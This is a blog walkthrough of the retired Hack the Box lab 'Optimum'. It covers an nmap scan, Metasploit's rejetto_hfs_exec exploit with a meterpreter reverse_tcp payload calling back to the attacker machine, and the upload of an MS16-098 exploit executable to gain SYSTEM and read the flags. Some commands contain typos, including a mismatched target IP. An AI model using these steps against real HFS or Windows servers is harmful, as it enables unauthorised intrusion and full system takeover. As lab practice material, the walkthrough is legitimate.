Hello friends!! Today we are going to solve another CTF challenge “Optimum” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.

nmap -A 10.10.10.8

From given below image, you can observe that we found ports 80 is open for file sharing using HFS 2.3 in victim’s network.

When I Google for searching any relative exploit I found first link for metasploit exploit.

Then I run msfconsole command in terminal and load metasploit framework for using rejetto_hfs_execmodule for exploiting target machine.

use exploit/windows/http/rejetto_hfs_exec

msfexploit(windows/http/rejetto_hfs_exec) >set payload windows/64/meterpreter/reverse_tcp

msfexploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.0.8

msfexploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6

msfexploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6

msfexploit(windows/http/rejetto_hfs_exec) >exploit

And it works perfectly, I have own meterpreter session 1 as shown below and by running sysinfo command I came to know about its system information.

Now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside its directories.

Inside c:\Document and Setting \kostas\Desktop I found user.txt file and used cat “file name” command for reading this file.

cat user.txt.txt

Great!! We got our 1^st flag successfully

For getting root flag I really struggle a lot, all privilege escalation exploit suggested by recon/local_exploit_suggester are proved vanish when I try them. Then I took help from Google for searching exploit related to windows server and found many exploits, between those “MS16-098 exploit 41020” was among them. I simply downloaded this exe file and go with manual privilege escalation.

After downloading exe file from Google, I transferred it into target’s machine via meterperter session.

Meterpreter> upload /root/Desktop/41020.exe .

Meterpreter> shell

Then after executing whoami command it’s assured me “nt authority\system”

Inside c:\Document and Setting \Administrator\Desktop I found root.txt file and used cat “file name” command for reading this file.

type root.txt

Great!! We got our 2nd flag successfully

Hack the Box Challenge: Cronos Walkthrough

Hack the Box Challenge: Popcorn Walkthrough

Hack the Box Challenge: Joker Walkthrough

Hack the Box Challenge: Tenten Walkthrough

Hack the Box Challenge: Arctic Walkthrough

Hack the Box Challenge: Haircut Walkthrough

Hack the Box Challenge: Node Walkthrough

Hack the Box Challenge: Granny Walkthrough

Hack the Box Challenge: Devel Walkthrough

Hack the Box Challenge: Shocker

Why you should know about SSL certificates: CertDB.com Case

Hack the Box Challenge: Mantis Walkthrough

Hack the BSides Vancouver VM (CTF Challenge)

Hack the Box Challenge: Bank Walkthrough

Hack the Box Challenge: Shrek Walkthrough

Hack the Box Challenge: Calamity Walkthrough

Hack the Box Challenge: Europa Walkthrough

Compressive Guide to Port Redirection using Rinetd

Hack the Box Challenge: Brainfuck Walkthrough

Hack the Box Challenge: Optimum Walkthrough